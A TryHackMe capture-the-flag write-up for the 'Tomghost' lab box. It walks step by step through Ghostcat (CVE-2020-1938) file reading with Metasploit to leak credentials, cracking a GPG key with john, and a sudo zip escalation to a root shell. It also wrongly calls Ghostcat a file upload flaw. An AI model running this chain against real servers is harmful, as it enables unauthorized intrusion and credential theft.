Tomghost
Tomghost is a linux machine which is rated easy by TryHackMe. This machine covers vulnerability on the Tomcat apache server and privilege escalation on a different user on the box. I’ll have to remove the flags and passwords…
Network scanning
The machine IP address is 10.10.68.255 and we shall start by scanning it by using nmap.
Command: nmap -sC -sV -oA initial 10.10.68.255
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─$ nmap -sC -sV -oA initial 10.10.68.255
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-20 11:58 EAT
Nmap scan report for 10.10.68.255
Host is up (0.17s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3c89f0b6ac5fe95540be9e3ba93db7c (RSA)
| 256 dd1a09f59963a3430d2d90d8e3e11fb9 (ECDSA)
|_ 256 48d1301b386cc653ea3081805d0cf105 (ED25519)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.12 seconds
Enumeration
There is a website running on port 8080. We notice it is Apache Tomcat version 9.0.30. If we google some of the vulnerabilities which affected that version we get File upload vulnerability CVE-2020-1938. Now lets launch Metaslpoit and search it.
1
2
3
4
5
6
7
8
9
10
11
msf6 > search CVE-2020-1938
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/tomcat_ghostcat 2020-02-20 normal Yes Apache Tomcat AJP File Read
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/http/tomcat_ghostcat
Use the exploit which we have found.
1
use auxiliary/admin/http/tomcat_ghostcat
Then set the RHOSTS to our machine’s IP address.
1
2
msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts 10.10.68.255
rhosts => 10.10.68.255
Once you have set the rhosts you can now exploit the system by using run or exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against 10.10.68.255
Status Code: 200
Accept-Ranges: bytes
ETag: W/"1261-1583902632000"
Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
Content-Type: application/xml
Content-Length: 1261
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:I_HAVE_REMOVED_THE_PASSWORD
</description>
</web-app>
msf6 auxiliary(admin/http/tomcat_ghostcat) >
You will find the username and the password on the description tag. You can also find this file here: /home/{YOUR_USERNAME}/.msf4/loot/20230420121725_default_10.10.68.255_WEBINFweb.xml_167447.txt
Initial Foothold
Since we have the username and password we can ssh into the machine.
1
└─$ ssh skyfuck@10.10.68.255
lets cat the user flag
1
2
skyfuck@ubuntu:~$ cat /home/merlin/user.txt
THM{I_HAVE_REMOVED_THE_FLAG}
If we go to the home directory, we find two files:
1
2
skyfuck@ubuntu:~$ ls
credential.pgp tryhackme.asc
Lets copy the files to our machine so as we can crack the credential.gpg
1
2
3
4
└─$ scp skyfuck@10.10.68.255:/home/skyfuck/* .
skyfuck@10.10.68.255's password:
credential.pgp 100% 394 0.9KB/s 00:00
tryhackme.asc
We shall use John to crack the password meaning we have to use gpg2john so as we have it’s hash to crack it.
1
└─$ gpg2john tryhackme.asc > hash
Now fire up john and let it do its thing.
1
2
3
4
5
6
7
8
9
10
11
12
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
I_HAVE_REMOVED_THE_PASSWORD (tryhackme)
1g 0:00:00:00 DONE (2023-04-20 12:37) 1.923g/s 2061p/s 2061c/s 2061C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Nice… We have the password of the gpg file so lets first import it.
1
2
3
4
5
6
7
8
9
10
skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg: imported: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
Once we have imported it we are going to decrypt the gpg.
1
2
3
4
5
6
7
8
9
10
11
12
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp
You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)
gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
"tryhackme <stuxnet@tryhackme.com>"
merlin:I_HAVE_REMOVED_THE_PASSWORD
skyfuck@ubuntu:~$
Wooah… We have found another user and the password.
Privilege Escalation
Lets login in his account and find our way to being the root.
1
2
3
└─$ ssh merlin@10.10.68.255
merlin@10.10.68.255's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)
By running sudo -l we see that the /usr/bin/zip can be ran by this user with root privilege.
1
2
3
4
5
6
7
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$
So lets go to gtfobins and find our payload to use. Link
1
2
3
4
5
6
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
#
We have root soo lets get our flag and get out of here.
1
2
3
# cat /root/root.txt
THM{I_HAVE_REMOVED_THE_FLAG}
#
If you have any other additional information and resources you can add it at the comment section. THANKS ;)